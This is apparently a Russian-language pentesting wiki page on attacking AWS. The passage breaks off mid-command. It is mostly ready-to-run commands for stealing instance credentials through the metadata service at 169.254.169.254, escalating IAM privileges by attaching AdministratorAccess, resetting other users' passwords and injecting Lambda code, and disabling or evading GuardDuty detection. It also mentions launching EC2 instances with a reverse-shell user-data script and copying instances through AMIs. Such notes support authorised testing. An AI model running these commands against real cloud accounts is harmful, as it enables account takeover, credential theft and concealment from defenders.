[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

[https://learntocloud.guide/#/phase5/README learntocloud(много ссылок)]

== Книги ==

[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]

Файл:Aws comprehend.png

2022-10-17T11:44:01Z

Drakylar:

Aws

2022-10-17T11:37:33Z

Drakylar: /* CodeGuru */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

==== iam:PutRolePolicy ====

Создать или обновить inline-политику для роли.

==== iam:PutGroupPolicy ====

Создать или обновить inline-политику для группы.

==== iam:PuserUserPolicy ====

Создать или обновить inline-политику.

==== iam:UpdateAssumeRolePolicy + sts:AssumeRole ====

Обновить документ "AssumeRolePolicyDocument" для роли.

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

==== iam:AttachUserPolicy ====

Позволяет прикрепить политику к пользователю. Если существует политика, дающая админские права - повышение.

== AWS Shield ==

Сервис для защиты от DDoS.

== Cognito ==

Позволяет быстро и просто добавлять возможности регистрации, авторизации и контроля доступа пользователей в мобильные и интернет-приложения.

=== Основное ===

Cognito отвечает за следующие действия:

* Регистрация пользователя (email + пароль)

* Авторизация пользователя

* Работа с сохраненной пользовательской информацией (устанавливается приложением)

* Специальные действия (например, предоставление AWS-ключей)

Все общение идет по HTTP(s). Особенность системы в том, что Cognito общается как напрямую с чужим веб-сайтом, так и напрямую с клиентским браузером. То есть веб-сервер не знает, какой был передан пароль (в нормальной реализации).

Пример URL: cognito-identity.us-east-1.amazonaws.com

За действие отвечает HTTP-заголовок "X-Amz-Target". В своем роде, это Endpoints API.

Какие параметры требуются для работы с ним:

1. Название Endpoint'а - "X-Amz-Target" заголовок

2. Регион - "aws_project_region" параметр

3. Session token - позже требуется для запросов.

4. Identity Pool ID - нужен для запросов типа Identity Pools.

Также пишут, что Cognito разделяется на две основные части:

* User Pools - для тех, кому нужна только регистрация и аутентификация

* Identity Pools - для тех, кому еще и нужен доступ к AWS-ресурсам.

=== X-Amz-Target (Endpoints) ===

==== AWSCognitoIdentityService.UpdateUserAttributes ====

У каждого пользователя есть поля, которые могут быть установлены самим пользователем (например, фамилия или дата рождения). Но также это могут быть и критичные поля, такие, как ID пользователя, администратор ли он и так далее.

Также раньше можно было менять поле email'а пользователя (0day): https://infosecwriteups.com/hacking-aws-cognito-misconfiguration-to-zero-click-account-takeover-36a209a0bd8a

Важно! Указано, что могут быть отправки СМС-уведомлений, так что тестировать осторожно.

P.S. Мб неверно название Endpoint'а. Надо проверять.

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Позволяет получить AWS ключи для работы с AWS-консолью. По-умолчанию отключено.

Требуется aws_identity_pool_id.

В некоторых примерах оно также было указано как "com.amazonaws.cognito.identity.model.AWSCognitoIdentityService.GetCredentialsForIdentity"

Подробнее тут: https://blog.appsecco.com/exploiting-weak-configurations-in-amazon-cognito-in-aws-471ce761963

==== AWSCognitoIdentityService.GetOpenIdToken ====

Позволяет получить OpenID токен, действительный на 10 минут.

В примере требуется только "IdentityID"

==== AWSCognitoIdentityService.GetOpenIdTokenForDeveloperIdentity ====

Тоже позволяет получить OpenID токен, действительный на 10 минут. Но также создает новый "IdentityID" (если он не был указан).

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Получить учетные данные пользователя по IdentityID: SecretKey, SessionToken, AccessKeyID.

https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
